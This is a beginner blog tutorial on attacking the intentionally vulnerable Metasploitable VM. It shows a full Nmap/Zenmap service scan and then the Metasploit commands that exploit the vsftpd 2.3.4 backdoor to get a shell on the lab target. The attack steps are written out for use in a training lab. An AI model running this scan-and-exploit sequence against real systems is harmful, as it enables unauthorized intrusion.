we already know how to use metasploit and how to gather information using Nmap/Zenmap. If you don't know please read my tutorials about Meatasploit and Nmap.
In this tutorial I'am introducing a simple server side attack. This tutorial is only for educational purpose do not use it illegally.
I'am using the Metasploitable VM as target machine.If you don't know about Meatasploitable then please visit my previous posts about it.
Open Metasploitable Virtual Machine
As default both are "msfadmin"
We are using our Kali machine to attack the target server as usual.
Open Kali machine.
Our attacking machine is ready now we want to gather informations about our target machine for that we only need the IP of the target machine.If you are attacking a site you can get the IP of the target using the command " ping <site URL>"
To get the IP. You need to type the following command in Metasploitable machine
ifconfig
After getting the IP we need to get the information about the target. For Information Gathering we can use Nmap. To make it easier I'm using Zenmap (Graphical interface of Nmap).
zenmap
Put the target IP in Target and click scan.
Nmap Output
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 22:40 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Initiating NSE at 22:41
Completed NSE at 22:41, 0.00s elapsed
Initiating ARP Ping Scan at 22:41
Scanning 10.0.2.4 [1 port]
Completed ARP Ping Scan at 22:41, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:41
Completed Parallel DNS resolution of 1 host. at 22:41, 0.11s elapsed
Initiating SYN Stealth Scan at 22:41
Scanning 10.0.2.4 [1000 ports]
Discovered open port 5900/tcp on 10.0.2.4
Discovered open port 53/tcp on 10.0.2.4
Discovered open port 25/tcp on 10.0.2.4
Discovered open port 445/tcp on 10.0.2.4
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 23/tcp on 10.0.2.4
Discovered open port 139/tcp on 10.0.2.4
Discovered open port 111/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Discovered open port 21/tcp on 10.0.2.4
Discovered open port 3306/tcp on 10.0.2.4
Discovered open port 5432/tcp on 10.0.2.4
Discovered open port 513/tcp on 10.0.2.4
Discovered open port 1099/tcp on 10.0.2.4
Discovered open port 2121/tcp on 10.0.2.4
Discovered open port 6667/tcp on 10.0.2.4
Discovered open port 6000/tcp on 10.0.2.4
Discovered open port 2049/tcp on 10.0.2.4
Discovered open port 512/tcp on 10.0.2.4
Discovered open port 8180/tcp on 10.0.2.4
Discovered open port 8009/tcp on 10.0.2.4
Discovered open port 514/tcp on 10.0.2.4
Discovered open port 1524/tcp on 10.0.2.4
Completed SYN Stealth Scan at 22:41, 0.12s elapsed (1000 total ports)
Initiating Service scan at 22:41
Scanning 23 services on 10.0.2.4
Completed Service scan at 22:42, 98.69s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 10.0.2.4
NSE: Script scanning 10.0.2.4.
Initiating NSE at 22:42
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 22:43, 75.43s elapsed
Initiating NSE at 22:43
Completed NSE at 22:44, 15.30s elapsed
Initiating NSE at 22:44
Completed NSE at 22:44, 0.01s elapsed
Nmap scan report for 10.0.2.4
Host is up (0.00080s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_ssl-date: 2020-07-14T17:14:02+00:00; +3s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Capabilities flags: 43564
| Some Capabilities: SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, Support41Auth, SwitchToSSLAfterHandshake, LongColumnFlag
| Status: Autocommit
|_ Salt: 86E6"Clv,u+t*oroU<k*
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2020-07-14T17:14:02+00:00; +3s from scanner time.
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 0:43:23
| source ident: nmap
| source host: C29CBC04.EB72D3BE.7B559A54.IP
|_ error: Closing Link: mhzfbvexa[10.0.2.15] (Quit: mhzfbvexa)
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:51:B9:CF (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.028 days (since Tue Jul 14 22:03:43 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=186 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h00m04s, deviation: 2h00m02s, median: 2s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2020-07-14T13:12:51-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 10.0.2.4
NSE: Script Post-scanning.
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Initiating NSE at 22:44
Completed NSE at 22:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.49 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
In the above results we want to check the open ports, services and version. If the service have any vulnerability then we use it to attack the target.
Here we are using the first open port given here which is Port 21
Here the port has the service ftp and its version is vsftpd 2.3.4.
To check this version of vsftpd have any vulnerabilities , we search it on our browser.
Here I searched as "vsftpd 2.3.4 exploit"
Go to the results and find exploit if any.
This version of VSFTPD has an exploit which allows us to gain a backdoor access to the target system. for more details about the exploit click here.
To execute this exploit we need the Framework called Metasploit. To know about metasploit click here
To use the exploit type the following command:
use exploit/unix/ftp/vsftpd_234_backdoor
show optionsftp
set RHOST 10.0.2.4
Now we are ready to go.
Just type exploit then we get the access in our target system.
exploit
Now we have access to the target system. check this by typing any command like ,
ls
pwd
